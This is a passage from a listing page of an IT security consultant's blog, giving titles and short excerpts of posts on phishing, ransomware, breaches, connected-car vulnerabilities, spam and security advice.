common: they are producing extremely large amounts of data which needs to be processed in the backend by very powerful computers. When we talk connectivity, we - [How to browse the web really anonymously](https://www.sorinmustaca.com/how-to-browse-the-web-really-anonymously/) - I've seen a lot of articles on the web about how to browse the web while keeping your privacy. By that I mean, nobody knows who you are, what you are browsing, no history kept, no temporary files remaining on the machine. Most of the articles on the web are created to make advertising to - [What do you do if your new flagship product sucks and you don't want any bad reviews? (Updated)](https://www.sorinmustaca.com/what-do-you-do-if-your-new-flagship-product-sucks-and-you-dont-want-any-bad-reviews/) - I got convinced by some clever "reviews" to pre-order the "Amazon Fire HD-10 with Alexa". The specs look extraordinary ! 25,65 cm (10,1 Zoll) 1080p Full HD-Display, 32 GB, with Special offers Now, what ca go wrong here ? Well, everything !!! The tablet has what it promises there... But there is a lot more - [Set of online resources from AV-Comparatives.org](https://www.sorinmustaca.com/set-of-online-resources-from-av-comparatives-org/) - Here is a set of resources put together by AV-Comparatives.org : General guidelines in minimizing risks Online vulnerability starts with human vulnerability E-mail security Web navigation Safe online banking Safe online gaming Safe streaming Safe file... The post Set of online resources from AV-Comparatives.org appeared first on Improve Your Security. Want to get the book ? - [How to block the Skype Ads](https://www.sorinmustaca.com/how-to-block-the-skype-ads/) - Since Microsoft took over Skype, only bad things are happening. Really, I hate Skype since they started to get their orders from Redmond. :( Once of the nerving things are the ads. Yes, these: Here is how to get rid of it: Open Control Panel, go to Network and Internet Options. If - [Dropbox phishing: someone is interested in your corporate files](https://www.sorinmustaca.com/dropbox-phishing-someone-is-interested-in-your-corporate-files/) - I wrote before about the Target Malware. Now I can also write about Phishing. Here is one for Dropbox: What is wrong with this email ? the contact me by extracting the user part in the email address (smustaca) The "Verify your email" goes directly to a phishing website. The text is rather - [Targeted Malware on the rise](https://www.sorinmustaca.com/targeted-malware-on-the-rise/) - Ever wondered what a "spear phishing" is ? Or a "targeted malware" ? See below: It is an email targeted to a member of an organization, which is made to look as legitimate as possible. The difference between normal phishing and malware emails and a targeted one is that the contents of the emails - [Experiment started: HTTPS for ITSecurityNews.info](https://www.sorinmustaca.com/experiment-started-https-for-itsecuritynews-info/) - The Internet is telling everyone to switch to HTTPS for various reasons: better security better SEO from the search engines (read: Google) others While I agree with most of the reasons, I think that it is not really necessary for a read-only news portal to have HTTPS. It is no secret transferred, no login, nothing... - [Exclusive interview for IPSwitch: When Security Awareness Training Overwhelms Users, Can Technology Help?](https://www.sorinmustaca.com/exclusive-interview-for-ipswitch-when-security-awareness-training-overwhelms-users-can-technology-help/) - A new article of Michael O'Dwyer got published in IPSwitch: When Security Awareness Training Overwhelms Users, Can Technology Help? I am happy to say that I was the only one interviewed, so this is actually an exclusive interview with me. “I would say that humans are the biggest problem, because they are the weakest - [Security for free, update after 4 years](https://www.sorinmustaca.com/security-for-free-update-after-4-years/) - About 4 years ago, while I was working at Avira, I wrote this article for (ISC)2's blog. http://www.sorinmustaca.com/security-for-free/ I wrote back then about how to cover all attack vectors for malware. I also wrote about the hidden costs, which many people tend to ignore. These costs are not acquisition costs. They are even not easily - [FritzBox users: protect your network for free!](https://www.sorinmustaca.com/fritzbox-users-protect-your-network-for-free/) - If you are living in Germany, Austria or Switzerland, there is a high chance that you are using one of the AVM's FritzBox for your broadband connection. The FritzBox is a very small device which runs a PowerPC processor and between 16 and 32 MB RAM. This is almost nothing! So, you can't install antivirus - [Lack of security made simple: Casual Insecurity](https://www.sorinmustaca.com/lack-of-security-made-simple-casual-insecurity/) - I am travelling quite a lot because of my job, working with Avira's customers to integrate their OEM Technologies. For this reason, I am very often in hotels and airports. Almost everywhere these days, I can find free WiFis: wireless networks with free of charge access. We all know that accessing resources through free WiFis - [WannaCry Ransomware - Executive summary](https://www.sorinmustaca.com/wannacry-ransomware-executive-summary/) - If you want news from the IT Security industry, please check IT Security News here: http://www.itsecuritynews.info/?s=WannaCry This is my summary, inspired from various sources on the web mentioned in the Sources (see at the end). The ransomware Wannacry has infected systems across the globe and has been the topic of discussion among security professionals - [Colorful spams are back!](https://www.sorinmustaca.com/colorful-spams-are-back/) - Yeeesss, the Spam/Trash folder is no longer so boring! Finally, the spammers are now using all the features of the email clients and have made the subjects to look much nicer. Do you know how they do that? They add UTF8 characters in the subject and then they encode the entire string using Quoted-Printable encoding: - [How to get rid of disturbing and traumatizing "children" films on YouTube](https://www.sorinmustaca.com/how-to-get-rid-of-disturbing-and-traumatizing-children-films-on-youtube/) - If you have children, then you must allow them from time to time to watch some children films on Youtube. They must have missed some episodes of their favorite series and you definitely can find them there. In any language you want. Just search for "Caillou", "Barbie", "Batman" , "Elsa" , "Spiderman" or anything alike - [I received the first "nigerian scam" on XING](https://www.sorinmustaca.com/i-received-the-first-nigerian-scam-on-xing/) - As a premiere, I received the first Nigerian Scam on XING. It is quite common to receive such requests on LinkedIn, but for me it is the first time on XING. This is the text: Hello Sorin Mustaca, I have partners who I front for to assist source for a foreign partner who could be - [Google Search Console fail over notifications for the Wordpress updates](https://www.sorinmustaca.com/google-search-console-fail-over-notifications-for-the-wordpress-updates/) - I have quite a lot of Wordpress based websites which I run and maintain. One of these is this blog: www.SorinMustaca.com All my Wordpress websites are configured to autoupdate to the latest Wordpress update. The same applies to their plugins and themes. Google Search Console (GSC) is a tool I used to manage better the - [The pros and cons of new tech: Science fiction collides with reality](https://www.sorinmustaca.com/the-pros-and-cons-of-new-tech-science-fiction-collides-with-reality/) - "The pros and cons of new tech: Science fiction collides with reality" by Michael O'Dwyer As Sorin Mustaca, an independent IT security consultant, says, "Adopting new technologies is never a mistake, if done properly." Assess the pros and cons of new tech There's rarely a one-size-fits-all solution in technology, and repercussions are never as severe - [Romanians Abroad: Sorin Mustaca on www.TheGoldenRomania.com](https://www.sorinmustaca.com/romanians-abroad-sorin-mustaca-on-www-thegoldenromania-com/) - Sorin Mustaca in Entrepreneur IT Professional RO - Constanta GER - Tettnang Sorin is one of the many IT professionals Romania has produced in recent years. He is unique however since he had the courage to partially differentiate from his employer and start his own business somewhere in Germany. He realized his vast expertise can - [Why does "everybody" think they are being/were hacked by Russian hackers?](https://www.sorinmustaca.com/why-does-everybody-think-they-are-beingwere-hacked-by-russian-hackers/) - Short answer: See the column "Country". When I say "Russia", I mean all Russian speaking countries, from the ex sovietic block. "Everybody" in quotes means the vast majority. Long answer: Some time ago, I was writing that China is massively attacking my blogs. Now, it seems that the situation has changed a lot. But, - [Healthcare mobile device security 101—solving modernization risk factors](https://www.sorinmustaca.com/healthcare-mobile-device-security-101-solving-modernization-risk-factors/) - Source: "Healthcare mobile device security 101—solving modernization risk factors" by Michael O'Dwyer | December 22, 2016 Many of these devices aren't designed for business use, which is another cause for concern. According to Sorin Mustaca, CSSLP, Security+, Project+, owner of Sorin Mustaca IT Security Consulting, "Most of these devices are taken from the consumer world - [Stock spam is back!](https://www.sorinmustaca.com/stock-spam-is-back-2/) - After many years, the penny stock spam is back. Hello, info! needs your attention. This is the only stock you need to buy today. Keep on reading to find out why.. (ticker: ) is a mobile games developer that has built some of the most popular games on the planet. The games have been - [Why most, if not all, "New Generation" endpoint security product are not self-sustained?](https://www.sorinmustaca.com/why-most-if-not-all-new-generation-endpoint-security-product-are-not-self-sustained/) - Fire Eye, Sentinel One, Crowdstrike, HackerOne, Cylance, Cyphort, Trustlook, Venafi, Clavister, Invincea, Code42, just to name a few, are so called NG Cybersecurity startups. NG comes from "New Generation" or "Next Generation"... (Yeah, just like in StarTrek. :) ) What exactly are these "NG" products and services? There is no single definition that fits - [IT Security News for iOS (iPhone and iPad)](https://www.sorinmustaca.com/it-security-news-for-ios-iphone-and-ipad/) - Direct link: https://itunes.apple.com/de/app/it-security-news-sorin-mustaca/id1136199454?mt=8 - [Love statistics? Read here what went wrong with the USA presidential election polls](https://www.sorinmustaca.com/love-statistics-read-here-what-went-wrong-with-the-usa-presidential-election-polls/) - Source: http://stats.stackexchange.com/questions/245063/us-election-results-2016-what-went-wrong-with-prediction-models Original question: First it was Brexit, now the US election. Many model predictions were off by a wide margin, and are there lessons to be learned here? As late as 4 pm PST yesterday (n.b. on 08.11), the betting markets were still favoring Hillary 4 to 1. I take it that the - [Scary to see details of the World's Biggest Data Breaches](https://www.sorinmustaca.com/scary-to-see-details-of-the-worlds-biggest-data-breaches/) - Source: http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/ No worries, the chart is very interactive and you can select what you want to see by changing the filter: The problem is that if you select like the screenshot below, you will not see anything anymore. This is scary! Statistics? Actually, the data is scary: it seems that at any - [Vulnerability analysis: how "HTTPoxy" allows redirect of web applications http-queries](https://www.sorinmustaca.com/vulnerability-analysis-how-httpoxy-allows-redirect-of-web-applications-http-queries/) - This is a guest post written by Alex Bod, Information Security Researcher and the founder of the Gods Hackers Team. The information about a set of vulnerabilities called HTTPoxy was published on July 18. Using this, attackers can replace the HTTP_PROXY environment variable that allows them to redirect http-queries to the Web applications on their - [DOS challenges with ITsecurity.co.uk](https://www.sorinmustaca.com/dos-challenges-with-itsecurity-co-uk/) - We were faced on ITSecurity.co.uk with a problem which was at first out of our control: “somebody” is creating, probably without knowing, a denial of service on this website. The consequence was that it was “consuming” the accesses to the database behind this WordPress site. The ISP hosting the website limits the accesses to 50K a day. - [Member in the "Alliance for Cyber Security"](https://www.sorinmustaca.com/member-in-the-alliance-for-cyber-security/) - I am officially in the page of participants of the Alliance for Cyber Security. Click on the image to see the list: Look who is before and after me. I would say that I am in good company, right? :) - [Chinese Researchers Remotely Hack Tesla Model S (Update)](https://www.sorinmustaca.com/chinese-researchers-remotely-hack-tesla-model-s/) - Security researchers from China-based tech company Tencent have identified a series of vulnerabilities that can be exploited to remotely hack an unmodified Tesla Model S while it’s parked or on the move. The researchers managed to perform various actions. While the vehicle was parked, the experts demonstrated that they could: control the sunroof, the turn - [Yahoo was hacked in 2014 and lost the credentials of over 500Mil accounts](https://www.sorinmustaca.com/yahoo-was-hacked-in-2014-and-lost-the-credentials-of-over-500mil-accounts/) - Oh boy.... they were hacked two years ago and they say it was a "state sponsored attack". What the hack is that ?! How do you differentiate a hack done by an employee from a state sponsored attack? Let's take it step by step: Yahoo has started to write to all affected customers this email: https://s.yimg.com/sf/support/en-us-security-notice-content.pdf Below - [Annoying Internet Ads: An Open Letter To Digital Marketers Everywhere](https://www.sorinmustaca.com/annoying-internet-ads-an-open-letter-to-digital-marketers-everywhere/) - I gave a nice interview to MICHAEL O'DWYER for IPSwitch and he wrote the following article: Annoying Internet Ads: An Open Letter To Digital Marketers Everywhere “Ads consume bandwidth, especially those delivered as Flash or code. If you’re on a mobile device, with a small screen, the ads will also cover a good portion of the screen, - [Dropbox was breached in 2012, the data is now online - a quote in SecurityWeek](https://www.sorinmustaca.com/dropbox-was-breached-in-2012-the-data-is-now-online-a-quote-in-securityweek/) - 68 Million Exposed in Old Dropbox Hack By Ionut Arghire on August 31, 2016 In an email response to a SecurityWeek inquiry, IT security expert Sorin Mustaca said that the surprising fact is that the 2012 hack of Dropbox didn’t emerge earlier, along with the other mega-breaches. He also notes that the use of the - [How to easily secure your smartphone](https://www.sorinmustaca.com/how-to-easily-secure-your-smartphone/) - Most people these days have a smartphone. These phones are actually no longer just mobile phones, in reality they are powerful mobile computers with several GB RAM, multicore CPUs and many GB storage. Despite these characteristics which bring them closer to computers than to phones, most of their users don’t consider security and privacy in - [Awesome Malware Analysis - Resources](https://www.sorinmustaca.com/awesome-malware-analysis-resources/) - Source and credit: https://github.com/rshipp/awesome-malware-analysis I save it here for easier reference. Do note that this list grows a lot ! A curated list of awesome malware analysis tools and resources. Inspired by awesome-python and awesome-php. Awesome Malware Analysis Malware Collection Anonymizers Honeypots Malware Corpora Open Source Threat Intelligence Tools Other Resources Detection and - [Car hacking again... now at high speed!](https://www.sorinmustaca.com/car-hacking-again-now-at-high-speed/) - Not even a week has passed since I was writing about "Not yet worried about vehicle hacking? You should be!" and we see in the news that at Blackhat that exactly this is happening. At BlackHat USA this week, the security researchers Charlie Miller and Chris Valasek are scheduled to present their latest findings in the world - [Not yet worried about vehicle hacking? You should be!](https://www.sorinmustaca.com/not-yet-worried-about-vehicle-hacking-you-should-be/) - As a matter of fact, it is not only vehicles that can be hacked, actually any IoT device can be hacked. AV-Test.org published this paper about vulnerabilities in the fitness wristbands and Apple Watch, which shows how they tested and how secure the devices are. However, a hack of these IoT devices is not as dangerous - [IT Security News has its own Android App](https://www.sorinmustaca.com/it-security-news-has-its-own-android-app/) - I have finally found the time to make the app I always wanted to have for the "IT Security News" service. Here is the page on Google's Play Store: And the screenshots of the app: Right now it is available only on Android devices, soon it will be available in the - [How to get rid of Pokemons in your Facebook feed](https://www.sorinmustaca.com/how-to-get-rid-of-pokemons-in-your-facebook-feed/) - Short version For those who are really, really, pissed off: Install FB Purity: http://www.fbpurity.com/ Open the FB Purity Facebook app by clicking on the word "FBP" near the search bar. Write in the main screen the word "pokemon" Save the configuration Enjoy your Pokemon free feed Longer version Go and install FB Purity from http://www.fbpurity.com/install.htm. - [Social engineering at its best: ransomware delivery methods](https://www.sorinmustaca.com/social-engineering-at-its-best-ransomware-delivery-methods/) - I wrote already about Ransomware (and here), but in a more generic way as I will do now. From me to me, with the subject "Documents from work" is the subject of a new Locky ransomware. Attached is a Word document containing macros. In the document (which is actually an archive) is a file called word\vbaProject.bin. - [What's the deal with a PhD?](https://www.sorinmustaca.com/whats-the-deal-with-a-phd/) - I found long time ago this animated GIF on the Internet and now I managed to download it. I don't know who created it, so I can't give credit to anyone. Why I post this here? Because it matters and because it is exactly my experience which I like to share. Not many know, but - [BMW and cybersecurity](https://www.sorinmustaca.com/bmw-and-cybersecurity/) - Not a month passes without seeing some major car manufacturer that has cybersecurity issues. This month we have seen made public a report from February 2016 related to BMW. The short story The BMW ConnectedDrive Web portal was found to contain a vulnerability that could result in a compromise of registered or valid vehicle - [Ransomware: Prevention is the best solution](https://www.sorinmustaca.com/ransomware-prevention-is-the-best-solution/) - Ransomware is malicious software that denies you access to your computer or files until you pay a ransom. There are several types of ransomware that are commonly seen: files/folders encryptors screen ‘lockers‘ MBR ransomware (MBR: master... The post Ransomware: Prevention is the best solution appeared first on Improve Your Security. Want to get the book ? - [VPNMentor.com: Cybertalk with IT security expert Sorin Mustaca](https://www.sorinmustaca.com/vpnmentor-com-cybertalk-with-it-security-expert-sorin-mustaca/) - Cybertalk with IT security expert Sorin Mustaca vpnMentor has had the privilege of talking with Sorin Mustaca, a Certified IT consultant with over 15 years of experience in IT security, and author of "Improve Your Security", a guide for the common end user that deals with the question of how to beware of cyber - [Quoted on SecurityWeek.com over the 32,8 M Twitter accounts leaked](https://www.sorinmustaca.com/quoted-on-securityweek-com-over-the-328-m-twitter-accounts-leaked/) - Source: http://www.securityweek.com/32-million-twitter-credentials-emerge-dark-web Author: Ionut Arghire, Security Week The cybercriminal behind the claimed Twitter leak is the same hacker who was previously attempting to sell stolen data from Myspace, Tumblr and VK user accounts, namely Tessa88@exploit.im. The Twitter credentials have already made it online on paid search engine for hacked data LeakedSource, which says it - [Let the competition for "securing the car" begin!](https://www.sorinmustaca.com/let-the-competition-for-securing-the-car-begin/) - I didn't actually want to write such a post, but several press releases drew my attention. So, the competition to protect the car has begun. Big players are now on the hunt for customers. But, when you talk to customers like Daimler, VW, BMW, Nissan and others, the discussions will take a while. I will maintain the list - [Network Access Control and IoT Security](https://www.sorinmustaca.com/network-access-control-and-iot-security/) - Network Access Control, is an approach to computer security that attempts to unify endpoint security technology (such as antivirus, host intrusion prevention, and vulnerability assessment), user or system authentication and network security enforcement. When a computer connects to a computer network, it is not permitted to access anything unless it complies with a business defined - [First time in history: 1.4 mil vehicles recalled due to security issues (hacking)](https://www.sorinmustaca.com/first-time-in-history-1-4-mil-vehicles-recalled-due-to-security-issues-hacking/) - Fiat Chrysler will recall 1.4 million vehicles in the United States to install software to prevent hackers from gaining remote control of the engine, steering and other systems in what federal officials said was the first such action of its kind. The announcement on Friday by FCA US LLC, formerly Chrysler Group LLC, was made - [Where PC security and Automotive security meet](https://www.sorinmustaca.com/where-pc-security-and-automotive-security-meet/) - I visited yesterday the IAA in Frankfurt. IAA stands for International Automobile Exhibition and takes place every year in Frankfurt, Germany. This is the place where every year the latest cars are being presented but also the newest technologies around cars. This year it was a lot about mobility, interaction, autonomous parking and driving, interconnectivity - [More insecure software around car (in)security](https://www.sorinmustaca.com/more-insecure-software-around-car-insecurity/) - As I mentioned already, anything that runs software has to abide to secure coding principles. Cars run more software than many other devices around us. And they run special software... which needs to be taken care of by other special software. And when that software is vulnerable, then you're in trouble! Now some researchers discovered that - [Self-driving car: security and liability](https://www.sorinmustaca.com/self-driving-car-security-and-liability/) - I read about Google's vision of driverless cars. I like it, but I can't stop to ask myself a few questions. Before that, Google's driverless car just got its driver license :) The NHTSA letter isn’t a ruling; it’s a clarification about how the agency will interpret the law in the future. You can read - [Nissan’s connected car app offline after trivial to exploit vulnerability revealed](https://www.sorinmustaca.com/nissans-connected-car-app-offline-after-trivial-to-exploit-vulnerability-revealed/) - On Wednesday Nissan disabled an app that allowed owners of its electric Leaf car to control their cars' heating and cooling from their phones, after the Australian researcher Troy Hunt showed he could use it to control others' cars as well. The NissanConnect EV app, formerly called CarWings, enabled a remote hacker to access the Leaf's temperature controls and review - [Do you actually need a security product in your car? Part 2: the classical antivirus](https://www.sorinmustaca.com/do-you-actually-need-a-security-product-in-your-car-part-2/) - I wrote in the first part of this article about Detection, Protection, Remediation and I stopped at the part where we analyze what kind of security products do you need in the car of tomorrow. 1)The classical antivirus We know it to be used mostly for files. But it can much more than that. a) Files There are - [Do you actually need a security product in your car? Part 1: Prevention, Detection, Remediation](https://www.sorinmustaca.com/do-you-actually-need-a-security-product-in-your-car-part-1/) - Note: This is going to be a somehow longer article which I will finish in a couple of related posts. A security product is a program that Prevents that malware enters the system Detects if previously unknown malware is running on the system Remediates the actions of detected malware on the system Note that it - [Do you actually need a security product in your car? Part 3 : Intrusion Prevention and Detection Systems](https://www.sorinmustaca.com/do-you-actually-need-a-security-product-in-your-car-part-3-intrusion-prevention-and-detection-systems/) - I ended part 2 with the promise that we will discuss about : 2) Intrusion detection and prevention systems (IDS/IPS or IDPS) From Wikipedia: Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity. The main functions of intrusion - [Quoted in SecurityWeek.com: 45 Million Potentially Impacted by VerticalScope Hack](https://www.sorinmustaca.com/quoted-in-securityweek-com-45-million-potentially-impacted-by-verticalscope-hack/) - Source: http://www.securityweek.com/45-million-potentially-impacted-verticalscope-hack Author: Ionut Arghire, Security Week Here is my longer comment: LeakedSource writes on their website about a massive breach of VerticalScope.com and all its affiliated websites from February 2016. However, neither VerticalScope.com nor any of the websites mentioned in the LeakedSource page mention anything related to a hack. Even if denial - [Article in German on Focus.de: Smartphone-SicherheitSchutz vor Hacker und Viren: So machen Sie Ihr Handy sicher](https://www.sorinmustaca.com/article-in-german-on-focus-de-smartphone-sicherheitschutz-vor-hacker-und-viren-so-machen-sie-ihr-handy-sicher/) - Smartphone-SicherheitSchutz vor Hacker und Viren: So machen Sie Ihr Handy sicher Mittwoch, 15.06.2016, 12:24 · von FOCUS-Online-Experte Sorin Mustaca Zur Person Sorin Mustaca arbeitet seit dem Jahr 2000 in der IT-Sicherheitsbranche. So war er von 2003 bis 2014 bei Avira beschäftigt und dort als Product Manager für Avira Antivir zuständig. Inzwischen arbeitet er als Berater. Mustaca - [How clever social engineering can overcome two-factor authentication... or not?](https://www.sorinmustaca.com/how-clever-social-engineering-can-overcome-two-factor-authentication/) - If you have a Google account you must have two-factor authentication enabled in order to prevent anyone to use your account by just having your username and password. If you don't know how to do that, check my free eBook here. 2FA requires something that you know (username and password) and something that you have (smartphone) - [What's the difference between Intrusion Prevention Systems and(IPS) and Web Application Firewall?](https://www.sorinmustaca.com/difference-intrusion-prevention-systems-andips-application-firewall/) - I was asked a few times what is the difference between HIPS, NIPS, IPS, Application Firewall. I did research a bit about this and started to write something. But, then I found this great article (see below at the resources) which describes everything perfect. Also read my own conclusions at the end of the article. - [What is this Google Trader?](https://www.sorinmustaca.com/what-is-this-google-trader/) - Short story: It is a waste of time and money, possibly even a scam! Long story: There are lots of ways to lose your money in this world, but here’s one I never thought before: binary option Web sites. But, what the hack is "binary option trading"? Don't need to read all. I marked with - [LinkedIn Legal : "Important information about your LinkedIn account"](https://www.sorinmustaca.com/linkedin-legal-important-information-about-your-linkedin-account/) - Yeah, they've been hacked 4 years ago and now their data is everywhere ... well, almost everywhere. The LinkedIn hack of 2012 is now being sold on the dark web. It was allegedly 167 million accounts and for a mere 5 bitcoins (about US$2.2k) you could jump over to the Tor-based trading site, pay your Bitcoins - [I was right about the Myspace.com data: it is indeed old](https://www.sorinmustaca.com/i-was-right-about-the-myspace-com-data-it-is-indeed-old/) - You may have heard reports recently about a security incident involving Myspace. We would like to make sure you have the facts about what happened, what information was involved and the steps we are taking to protect your information. WHAT HAPPENED? Shortly before the Memorial Day weekend, we became aware that stolen Myspace user login - [Quoted in SecurityWeek.com on the Myspace.com leak](https://www.sorinmustaca.com/quoted-in-securityweek-com-on-the-myspace-com-leak/) - Ionut Arghire of SecurityWeek wrote a very good article about the potential breach of Myspace.com: 427 Million MySpace Passwords Appear For Sale and I was quoted a lot! Thanks, Ionut! I wrote more extensively about what I think of this leak: Myspace.com was apparently hacked, 360Mil accounts on sale and nobody knows any details There are many things that - [Myspace.com was apparently hacked, 360Mil accounts on sale and nobody knows any details](https://www.sorinmustaca.com/myspace-com-was-apparently-hacked-360mil-accounts-on-sale-and-nobody-knows-any-details/) - "Myspace was hacked" writes LeakedSource on their dedicated page for MySpace.com. They do not add any kind of details about this hack except that they received a copy of the data from an email address (not from the hacker). As a matter of fact, there is nowhere on the web any kind of details, not - [To Pentest or not to Pentest: is this really the question?](https://www.sorinmustaca.com/to-pentest-or-not-to-pentest-is-this-really-the-question/) - I wrote before about Pentesting in the article "What is Pentesting, Vulnerability Scanning, which one do you need?" . If you're a company having web services of any kind or a kind of backend, you are asking yourself if you should only do pentesting or make things right and do the entire risk assessment and threat - [About VirusTotal's change of heart or...](https://www.sorinmustaca.com/about-virustotals-change-of-heart-or/) - Virus Total is a multi-engine malware scanner, an aggregator of security solutions. You can upload a file or provider an URL and it will check it with all available engines. Mostly command line scanner or plain SDKs to use the engine. The AV Industry wants to work with VT because if VT uses an engine, - [Dramatic change to storage limits in OneDrive!](https://www.sorinmustaca.com/dramatic-change-to-storage-limits-in-onedrive/) - OneDrive's only advantage in comparison to Dropbox, GDrive and others were: 15 GB of space (OK, Google offers the same, but for all your data, including photos and email) Availability on all types of devices through apps (also non Microsoft) Now, they reduced the space 3 times ! Starting July 27 you get only 5 - [Microsoft EMET has a problem with Java - but who doesn't ?](https://www.sorinmustaca.com/microsoft-emet-has-a-problem-with-java-but-who-doesnt/) - EMET stands for Enhanced Mitigation Experience Toolkit - and it is a tool that you MUST have installed on your Windows PC. EMET is a utility that helps prevent vulnerabilities in software from being successfully exploited.EMET achieves this goal by using security mitigation technologies. These technologies function as special protections and obstacles that an exploit - [The sad status of online advertising ... now gets to the real topic](https://www.sorinmustaca.com/the-sad-status-of-online-advertising-now-gets-to-the-real-topic/) - I wrote a few days ago a post about the The sad status of online advertising, talking about the practices of Forbes which forces the read to disable ad-blockers. Later, in a second post called A new type of fraud: News Scareware, I mentioned Washington Post that is enforcing the email address of the user in order to - [A new type of fraud: News Scareware](https://www.sorinmustaca.com/a-new-type-of-fraud-news-scareware/) - After posting the article with the ads, I thought that I covered all stupid things that online publications do to force their readers to pay, subscribe or to disable ad blockers. Well, this was not correct... The stupidity goes on... with Washington Post. They request your email address in order to allow you to - [The sad status of online advertising](https://www.sorinmustaca.com/the-sad-status-of-online-advertising/) - I will give in this post an example having FORBES.COM as target. I want to emphasize that this is not the only site that behaves like this! If you have an ad blocking plugin active and you visit www.forbes.com you will be promted to disable the ad blocker and you see the picture above. - [What is Pentesting, Vulnerability Scanning, which one do you need?](https://www.sorinmustaca.com/what-is-pentesting-vulnerability-scanning-which-one-do-you-need/) - I get very often asked about these two concepts and I noticed that there is a lot of unclarity around these topics. At the end, I will tell you my own opinion and give you some advices. Vulnerability scan Also known as Vulnerability Assessment, looks for known vulnerabilities in your systems and reports potential - [What's the issue with the mobile apps permissions?](https://www.sorinmustaca.com/whats-the-issue-with-the-mobile-apps-permissions/) - If an App requires some permissions like Access Camera, Access Microphone, does it mean that they can do with these devices of a smartphone whatever they want, whenever they want? Short answer Yes, but it is not so simple Long answer There are rumours, that apps like WhatsApp, Facebook, G+, etc., are using the camera - [Cybersecurity vs. Information Security (infosec)](https://www.sorinmustaca.com/cybersecurity-vs-information-security-infosec/) - Somebody asked me why do I have in my LinkedIn profile "IT Security Expert" and in my company website www.mustaca.com "Sorin Mustaca Cybersecurity". In order to answer that, I need to clarify the difference between Cybersecurity and Information Security (infosec). I googled a bit because I don't have too much time and I did find something - [About ransomware, Google malvertising and Fraud](https://www.sorinmustaca.com/about-ransomware-google-malvertising-and-fraud/) - I am sick and tired to see so many people affected by this wave of ransomware attacks. I don't want to go into details about Ransomware like Locky because it has been written quite a lot about it. The most common way that Locky arrives is as follows: You receive an email containing an attached - [Responsibility for Vehicle Security and Driver Privacy in the Age of the Connected Car](https://www.sorinmustaca.com/responsibility-for-vehicle-security-and-driver-privacy-in-the-age-of-the-connected-car/) - Source: Responsibility for Vehicle Security and Driver Privacy in the Age of the Connected Car Sponsored by: Veracode, Created by IDC Author: Duncan Brown IDC conducted in-depth interviews with leading vehicle manufacturers and automotive industry representatives, as well as 1072 drivers across the UK and Germany. These are the questions that the survey had: - ["Cyber Security" or "Cybersecurity" ?](https://www.sorinmustaca.com/cyber-security-or-cybersecurity/) - “Cybersecurity” and “cyber security” are getting more and more mixed usage lately, so much that they are becoming almost as ambiguous as the term “cloud” was a few years back. The challenge information security executives and professionals are faced with is knowing ̶ as the title implies ̶ when and why the term should be - [How to combat the brute force attacks on WordPress blogs](https://www.sorinmustaca.com/how-to-combat-the-brute-force-attacks-on-wordpress-blogs/) - We wrote 1.5 months ago in the article Botnet attack on WordPress about the ongoing distributed attack on the WordPress platform. WordPress has a default administrator called “admin” which can be changed to any user upon installation. According to various sources, the attack guesses up to 1000 most commonly-used passwords (see here examples). Now, we see that - [For many still not clear what "cloud" means](https://www.sorinmustaca.com/for-many-still-not-clear-what-cloud-means/) - There is a very good and detailed article on Wikipedia about what Cloud computing means: Cloud computing, also known as on-demand computing, is a kind of Internet-based computing that provides shared processing resources and data to computers and other devices on-demand. It is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of - [Is eBay actually supporting phishing?](https://www.sorinmustaca.com/is-ebay-actually-supporting-phishing/) - From time to time I am wondering if these guys (I am thinking at eBay, PayPal, Amazon, some banks) are actually trying to help phishers to do their "jobs". The email you seen in the screenshot is a 100% authentic email from eBay Germany. I am being asked, you guessed right, to "protect my eBay - [Worst nightmare becomes reality: Linux Mint distro hacked and backdoor introduced](https://www.sorinmustaca.com/worst-nightmare-becomes-reality-linux-mint-distro-hacked-and-backdoor-introduced/) - Linux distributor 'Linux Mint' warned users over the weekend that it has been hacked, exposing users to a malicious backdoor and compromising sensitive customer information. Project leader Clement Lefebvre explained in a blog post that the attacker made a modified Linux Mint ISO, with a backdoor in it, and then hacked the distributor’s website to - [Digital clock mathemathics](https://www.sorinmustaca.com/digital-clock-mathemathics/) - If you're like me, you definitely have such a digital clock somewhere in your house, most probably near your bed. Ever wondered what is the maximum number of segments of the clock that are used at a certain hour? And what time is it then? I did... and here is how I count them. I - [Why do the more recent spams have so colorful subjects?](https://www.sorinmustaca.com/why-do-the-more-recent-spams-have-so-colorful-subjects/) - And I mean really colorful, as in it has signs and colors. Like the one in the featured image. If you look in their source, they look like this: Subject: =?utf-8?b?8J+QlfCfkIhZb3UgY2FuIHNhdmUgb24gcGV0IGZvb2Qg8J+QlfCfkIg=?= As it can be seen on this page, there are all possible symbols described: http://www.unicodetools.com/unicode/codepage-utf8.php All it has to do is to force - [Google gives 2GB GDrive space for completing security checkup](https://www.sorinmustaca.com/google-gives-2gb-gdrive-space-for-completing-security-checkup/) - Google gives to its users 2GB of permanent drive space for free by completing a simple security checkup. It will show up immediately. Furthermore, if you participated last year, you can receive the extra 2GB again. Just go here (or click on the picture below) and set up your security settings. - [What do you think: new type of spam or just misconfigured servers?](https://www.sorinmustaca.com/what-do-you-think-new-type-of-spam-or-just-misconfigured-servers/) - My Junk folder from ITSecurityNews.info is currently flooded with "Delivery Status Notification" from various servers, all with the same content. Various servers, same content, in Russian: The email goes indeed from a non existent email address of my domain to some server that refuses it for various reasons. What can you do? Block - [More on the hype behind OpenSSH flaw that could leak crypto keys](https://www.sorinmustaca.com/more-on-the-hype-behind-openssh-flaw-that-could-leak-crypto-keys/) - Richard Adhikari wrote a good overview about the "OpenSSH Flaw Could Leak Crypto Keys" in the LinuxInsider.com website. I got quoted : The flaws are not dangerous, security consultant Sorin Mustaca said. "In order to exploit this vulnerability, an attacker must convince its target OpenSSH client to connect to a malicious server -- an unlikely - [Unitymedia is warning customers about default passwords of their routers](https://www.sorinmustaca.com/unitymedia-is-warning-customers-about-default-passwords-of-their-routers/) - Unitymedia has sent a large mailing to their customers having the Ubee Modems requesting them to change the default password of the device. Well, that makes sense if you think that they come with user "admin" and password "admin". If you didn't change the password until now, go here and check the manual. What bothers me - [How you can see that the cyber crooks are preparing for XMas](https://www.sorinmustaca.com/how-you-can-see-that-the-cyber-crooks-are-preparing-for-xmas/) - I start this post with the Conclusion Don't fall for these scams! You will never get money or vouchers like this. Details I see a lot of these messages in my Spam folder: PayPal payment received Report Spam Hi, Your account has been credited with $563.50 Click Here to Claim - [My article in Security Insider 